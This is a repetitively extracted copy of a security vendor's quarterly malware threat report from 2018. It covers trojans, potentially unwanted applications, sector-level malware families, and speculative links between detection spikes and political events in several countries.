The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
